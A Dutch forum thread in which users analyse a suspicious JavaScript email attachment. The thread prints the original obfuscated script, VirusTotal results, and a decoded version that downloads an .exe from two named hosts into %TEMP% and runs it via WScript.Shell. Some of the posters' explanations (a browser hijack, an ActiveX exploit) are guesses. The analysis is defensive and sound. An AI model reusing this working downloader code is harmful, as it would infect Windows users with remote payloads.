De moeite loont? Wie leest een java-script.

[Old man]

Zoals ik al eerder vertelde werk ik wel met Windows, maar alleen in VirtualBox. Mailen en Internetten doe ik ik LinuxMint.
Vanmorgen ontving ik een vreemd mailtje dat ik inmiddels aan de ACM (Spamklacht) heb doorgegeven. De afzender was een mij onbekende marg.kuijer@nunog.com . Mijn achternaam is ook kuijer. De site nunog.com bestaat niet. De mail kwam vandaag binnen, maar was gedateerd 16-01. Er stond geen tekst in. Het onderwerp was 1/16/2016 8:01:37 AM. De mail bevatte een .zip bestand als bijlage en in die zip zat een .js bestand (een javascript)
Ik heb wel een vermoeden wat de oorzaak is. Mijn oudste zus heeft de gewoonte allerlei onzinnige "leuke"  mails rond te sturen, waarbij alle adressen als cc zijn toegevoegd. Na een waarschuwing van mijn kant doet ze dat (soms  ) als bcc, maar niet altijd....
Toch maar goed dat ik geen mail in Windows ontvang. Ik weet niet wat er zou gebeuren als ik die zip in Windows zou uitpakken want ik lees geen Java. Maar ik ben wel benieuwd wat dat script zou doen. Wie leest hier Java?

[Pjotr]

Stuur dat zip-bestand eens op naar www.virustotal.com ? Ik ben benieuwd....

[Old man]

Dit is het Java-script:

Code: [Selecteer]

function k(b){0<=b.indexOf('=')&&(b=b.substr(0,b.indexOf('=')));for(var V=0,H=0,K,m,L,J,P=0,r,u,M='';V<b.length;++V){m='='==b.charAt(V)?0:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.indexOf(b.charAt(V));H=(H+6)%8;if(6!=H){K+=m>>H;if(0==P)J=!0,u=0,L=1,128>K&&(L=0,u=K&64,J=!1);else if(128!=(K&192))return!1;for(r=32;J&&0<r;r>>=1)K&r?++L:J=!1;J||(r=6+6*P-L,6<r&&(r=6),r&&(u+=K%(1<<r)<<6*(L-P)));P==L?(M+=String.fromCharCode(u),P=0):++P}K=H?m%(1<<H)<<8-H:0}return M}function g(F){eval(F);}var t=new Object();t.f='DQoNCmZ1bmN0aW9uIGhmYnVRSW9NTyhXdlpyclVzS3ZCYikgew0KdmFyIEtNellZQlpiID0gV1NjcmlwdC5DcmVhdGVPYmpl';t.n='Y3QoIldzY3JpcHQuU2hlbGwiKTsNCktNellZQlpiLlJ1bihXdlpyclVzS3ZCYiwgMHgxLCAweDApOw0KfQ0KdmFyIHMgPSAiYmVsYWhob2FzdC5uZXQvOTMuZXhlPyBiZWxhaGhvYXN0YmlsLmNvbS85My5leGU/ID8gPyA/Ii5zcGxpdCgiICIpOw0KdmFyIEpWSyA9KCgxLyo3SlhJOTc0MTUzNTk2bjU1MzE3dU0zNTQxOTNlT2laKi8pPyJXU2NyaSI6IiIpKyJwdC5TaGVsbCI7DQp2YXIgS0IgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdChKVkspOw0KdmFyIFdrID0gIiVURU1QJVxcIjsNCnZhciBYb3YgPSBLQi5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoV2spOw0KdmFyIEZtSSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJTY3JpcHRpbmciLypZMG9tenlmWWt6RyovKyIuRmlsZSIrLypLNVhyaG1SKi8iU3lzdGVtT2JqZWN0Iik7DQp2YXIgQ1hiaSA9IFhvdisiYVNac3NuRlxcIjsNCnRyeXsNCkZtSS5DcmVhdGVGb2xkZXIoQ1hiaSk7DQp9Y2F0Y2goSW56aWh0KXsNCn07DQp2YXIgeVlmID0gIjIuWE1MSCI7DQp2YXIgWWhoID0geVlmICsgIlRUUCI7DQp2YXIgTm4gPSB0cnVlICAsIFFaclkgPSAiQURPRCI7DQp2YXIgTGkgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTVMiKyJYTUwiKyg2NDQ2MjAsIFloaCkpOw0KdmFyIHJoSSA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KFFaclkgKyAiQi5TdCIrKDQyMDIyMSwgInJlYW0iKSk7DQp2YXIgSmdTID0gMDsNCnZhciBsID0gMTsNCnZhciBkUVhrSEZOID0gNzU2MzgwOw0KZm9yICh2YXIgVT1KZ1M7IFU8cy5sZW5ndGg7IFUrKykgIHsNCnZhciBaayA9IDA7DQp0cnkgIHsNCnBvaSA9ICJHRVQiOw0KTGkub3Blbihwb2ksImh0dHA6Ly8iK3NbVV0rbCwgZmFsc2UpOyBMaS5zZW5kKCk7IGlmIChMaS5zdGF0dXMgPT0gODA1LTYwNSkgIHsgICAgICANCnJoSS5vcGVuKCk7IHJoSS50eXBlID0gMTsgcmhJLndyaXRlKExpLnJlc3BvbnNlQm9keSk7IGlmIChyaEkuc2l6ZSA+IDI1MTA2OC05NzkpICB7DQpaayA9IDE7IHJoSS5wb3NpdGlvbiA9IDA7IHJoSS5zYXZlVG9GaWxlLypmS2ZWODJUVERyKi8oQ1hiaS8qYjlENDExQnhQMCovK2RRWGtIRk4rIi5leGUiLDQtMik7IHRyeSAgew0KaWYgKCgobmV3IERhdGUoKSk+MCw3ODM0NDIxODg4KSkgew0KaGZidVFJb01PKENYYmkrZFFYa0hGTisvKnQyQng2OGVzY20qLyIuZXhlIi8qcjR1RDkyMFFRQiovKTsgDQpicmVhazsNCn0NCn0NCmNhdGNoIChueSkgIHsNCn07IA0KfTsgcmhJLmNsb3NlKCk7IA0KfTsgDQppZiAoWmsgPT0gMSkgIHsNCkpnUyA9IFU7IGJyZWFrOyANCn07IA0KfQ0KY2F0Y2ggKG55KSAgeyANCn07IA0KfTsgDQoNCg=';if (((new Date())>0,81106)) {g(k(t.f.substring(0,t.f.length)+t.n));}
Ik deed wat jij vroeg, Pjotr. Dit is het resultaat:

Antivirus    Result                                                                    Update NANO-Antivirus    Trojan.Script.Nemucod.dzmpqx                     20160126 Cyren                   JS/Downldr.CZ.gen    [                                       20160126 Qihoo-360            js.url.downloader.c                                            20160126 Kaspersky            HEUR:Trojan-Downloader.Script.Generic    20160126 De overige 50 virus-scanners herkenden de code niet

[Pjotr]

Een Trojaan, dus.... 

[niekn]

jup zie in t script iets wat op base64 lijkt ff door de decoder runnen...
oh verrek t is base64!!

t zijn 2 variabelen (n en f) die aan elkaar geplakt worden als base64-string en dan door de decoder gegooid worden.

Code: [Selecteer]

function hfbuQIoMO(WvZrrUsKvBb) {
var KMzYYBZb = WScript.CreateObject("Wscript.Shell");
KMzYYBZb.Run(WvZrrUsKvBb, 0x1, 0x0);
}
var s = "belahhoast.net/93.exe? belahhoastbil.com/93.exe? ? ? ?".split(" ");
var JVK =((1/*7JXI974153596n55317uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var KB = WScript.CreateObject(JVK);
var Wk = "%TEMP%\\";
var Xov = KB.ExpandEnvironmentStrings(Wk);
var FmI = new ActiveXObject("Scripting"/*Y0omzyfYkzG*/+".File"+/*K5XrhmR*/"SystemObject");
var CXbi = Xov+"aSZssnF\\";
try{
FmI.CreateFolder(CXbi);
}catch(Inziht){
};
var yYf = "2.XMLH";
var Yhh = yYf + "TTP";
var Nn = true  , QZrY = "ADOD";
var Li = WScript.CreateObject("MS"+"XML"+(644620, Yhh));
var rhI = WScript.CreateObject(QZrY + "B.St"+(420221, "ream"));
var JgS = 0;
var l = 1;
var dQXkHFN = 756380;
for (var U=JgS; U<s.length; U++)  {
var Zk = 0;
try  {
poi = "GET";
Li.open(poi,"http://"+s[U]+l, false); Li.send(); if (Li.status == 805-605)  {     
rhI.open(); rhI.type = 1; rhI.write(Li.responseBody); if (rhI.size > 251068-979)  {
Zk = 1; rhI.position = 0; rhI.saveToFile/*fKfV82TTDr*/(CXbi/*b9D411BxP0*/+dQXkHFN+".exe",4-2); try  {
if (((new Date())>0,7834421888)) {
hfbuQIoMO(CXbi+dQXkHFN+/*t2Bx68escm*/".exe"/*r4uD920QQB*/);
break;
}
}
catch (ny)  {
};
}; rhI.close();
};
if (Zk == 1)  {
JgS = U; break;
};
}
catch (ny)  {
};
};

blijkbaar verdoezelen ze op deze manier de daadwerkelijke downloadcode.

[Old man]

Niekn,

Heb je enig idee wat dit scriptje doet? Mijn programmeerkennis reikt niet verder dan VBA.
Of om met Bertje Visser te spreken: Vertel! Vertel!

Bart

[partyrabbit]

Even een korte reactie uit het blote hoofdje zonder verder uitzoeken.

Hij haalt bestand 93PUNTexe op van belahhoastPUNTnet
En gaat eea installeren waaronder de aanmaak van directory CXbi, waar hij ook een file in aanmaakt.
En hij gaat aan de gang met ActiveX. Wat precies zie ik niet (zal van die exe afhangen) maar ik heb het vermoeden dat je browser overgenomen wordt.
Hij stelt op basis van variabelen nieuwe link(s)s samen en stuurt je naar die pagina('s).

Ik denk dat deze voor nieuwe startpagina's vol reclame gaat zorgen, en ondertussen zich vermenigvuldigd om moeilijk verwijderd te kunnen worden.

Code: [Selecteer]

ct("Wscript.Shell");
KMzYYBZb.Run(WvZrrUsKvBb, 0x1, 0x0);
}
var s = "[color=red]belahhoast.net/93.exe[/color]? belahhoastbil.com/93.exe? ? ? ?".split(" ");
var JVK =((1/*7JXI974153596n55317uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var KB = WScript.CreateObject(JVK);
var Wk = "%TEMP%\\";
var Xov = KB.ExpandEnvironmentStrings(Wk);
var FmI = new [color=red]ActiveX[/color]Object("Scripting"/*Y0omzyfYkzG*/+".File"+/*K5XrhmR*/"SystemObject");
var CXbi = Xov+"aSZssnF\\";
try{
FmI.[color=red]CreateFolder(CXbi)[/color];
}catch(Inziht){
};
var yYf = "2.XMLH";
var Yhh = yYf + "TTP";
var Nn = true  , QZrY = "ADOD";
var Li = WScript.CreateObject("MS"+"XML"+(644620, Yhh));
var rhI = WScript.CreateObject(QZrY + "B.St"+(420221, "ream"));
var JgS = 0;
var l = 1;
var dQXkHFN = 756380;
for (var U=JgS; U<s.length; U++)  {
var Zk = 0;
try  {
[color=red]poi = "GET";
Li.open(poi,"http://"+s[U]+l, false); Li.send(); if (Li.status == 805-605)[/color]  {     
rhI.open(); rhI.type = 1; rhI.write(Li.responseBody); if (rhI.size > 251068-979)  {
Zk = 1; rhI.position = 0; rhI.saveToFile/*fKfV82TTDr*/(CXbi/*b9D411BxP0*/+dQXkHFN+".exe",4-2); try  {
if (((new Date())>0,7834421888)) {
hfbuQIoMO(CXbi+dQXkHFN+/*t2Bx68escm*/".exe"/*r4uD920QQB*/);
break;
}
}
catch (ny)  {
};
}; rhI.close();
};
if (Zk == 1)  {
JgS = U; break;
};
}
catch (ny)  {
};
};
Moderator edit: "quote" tag veranderd in "code" tag.

[niekn]

veel code is een beetje vaag dus ik zal mijn best doen.

 t maakt een lijst aan van exe bestanden:

Code: [Selecteer]

var s = "belahhoast.net/93.exe? belahhoastbil.com/93.exe? ? ? ?".split(" ");(split(" ") splitst op spaties, dus je krijgt een lijst van stukjes tekst:
belahhoast.net/93.exe?
belahhoastbil.com/93.exe?
?
?
?
)

ik denk dat dit onze "payload is" dit willen we dat op t slachtoffer word uitgevoerd.

Code: [Selecteer]

var FmI = new ActiveXObject("Scripting"/*Y0omzyfYkzG*/+".File"+/*K5XrhmR*/"SystemObject");activeX is de scriptingtaal van internet explorer, ik denk dat men een kwetsbaarheid in active X wil gebruiken om genoemde exe bestanden uit te voeren.

Code: [Selecteer]

FmI.CreateFolder(CXbi);maakt een map aan op je systeem om alles in te downloaden.

Code: [Selecteer]

for (var U=JgS; U<s.length; U++)  {dit betekent simplelweg, herhaal alles wat tussen {} staat voor iedere link die in s staat (zie bovenste commando) s is de lijst met exe bestanden die we willen downloaden.
op welk nummer we in de lijst zitten word opgeslagen in U.

dan volgt er een try-blok want het kan zijn dat de server offline is of degene die dit script uitvoert geen internet heeft, in dat geval falen de volgende commando's

Code: [Selecteer]

poi = "GET";dit betekent dat we aangeven dat we alleen maar iets willen downloaden, als je bijvoorbeeld registreert op een forum of je wilt inloggen dan stuur je data mee dat is een POST, een GET-request zegt dat we alleen maar iets van de server willen hebben, een normaal downloadcommando dus.

Code: [Selecteer]

Li.open(poi,"http://"+s[U]+l, false);maak een GET-request aan.

Code: [Selecteer]

Li.send();verzend het naar de server

Code: [Selecteer]

if (Li.status == 805-605)  {als dat goed is gegaan

Code: [Selecteer]

rhI.open(); rhI.type = 1;open de "response" (data wat van de server terug komt)

rhI.write(Li.responseBody);

en schrijf die data naar een file.

if (((new Date())>0,7834421888)) {

als de huidige datum groter is dan 0,7834421888 (neem aan dat dit een unix timestamp is)

Code: [Selecteer]

hfbuQIoMO(CXbi+dQXkHFN+/*t2Bx68escm*/".exe"/*r4uD920QQB*/); gebeurt dit. ik moet er wel bij vertellen dat alles tussen /* en */ commentaar is en de rest zijn variablenamen. ik denk dat hier de daadwerkelijke naam van de .exe via verschillende base64stukjes in die vars bovenaan aan elkaar geplakt worden en weer gedecodeerd worden om zo het voorheen gedownloade bestand uit te voeren.

de catches eronder zijn error-afhandeling voor het geval er iets misgaat tijdens het proces. ze doen niets, alleen ervoor zorgen dat je browser niet crasht. (verbaast me dat een hacker daaraan denkt!!)

je ziet wel dat degene die t script geschreven heeft heel veel base64 gebruikt om de zooi te verdoezelen en te proberen het ons moeilijk te maken het te lezen.
verder staat er veel stuk tussen commentaar, dat commentaar lijkt ook op base64 maar ik krijg t niet gedecodeerd...

[partyrabbit]

Lol. Tegelijk.

Je vergeet alleen te zeggen wat het doet.
Hij stelt variabele links samen en stuurt je daar naartoe. Dit is zo'n virus wat je browser overneemt met een (wisselende) reclame-startpagina.

[niekn]

Lol. Tegelijk.

Je vergeet alleen te zeggen wat het doet.
Hij stelt variabele links samen en stuurt je daar naartoe. Dit is zo'n virus wat je browser overneemt met een (wisselende) reclame-startpagina.

jup je hebt ook zo'n Wscrpit commando:

Code: [Selecteer]

ct("Wscript.Shell");ik denk dat de W in dit geval voor Windows staat, het active-X gebeuren verderop wijst ook in de richting dat dit een speciaal internet-explorer virus is.

wel grappig dat ze t proberen te verdoezelen met base64 en dan denken dat wij daar niet achter komen.

[partyrabbit]

ik denk dat de W in dit geval voor Windows staat, het active-X gebeuren verderop wijst ook in de richting dat dit een speciaal internet-explorer virus is.

93PUNTexe zegt ook wel genoeg denk ik. 

[pederoco]

En dus voor Old Man te spreken, wat is dit dus nu zonder franje!

[Ron]

wijst ook in de richting dat dit een speciaal internet-explorer virus is.

Heb ik alweer geen mogelijkheid om een virus op mijn laptop te krijgen.
Wat is mijn systeem weer gezond

[niekn]

En dus voor Old Man te spreken, wat is dit dus nu zonder franje!

iets wat een .exe download en op je pc via een lek in activeX probeert uit te voeren.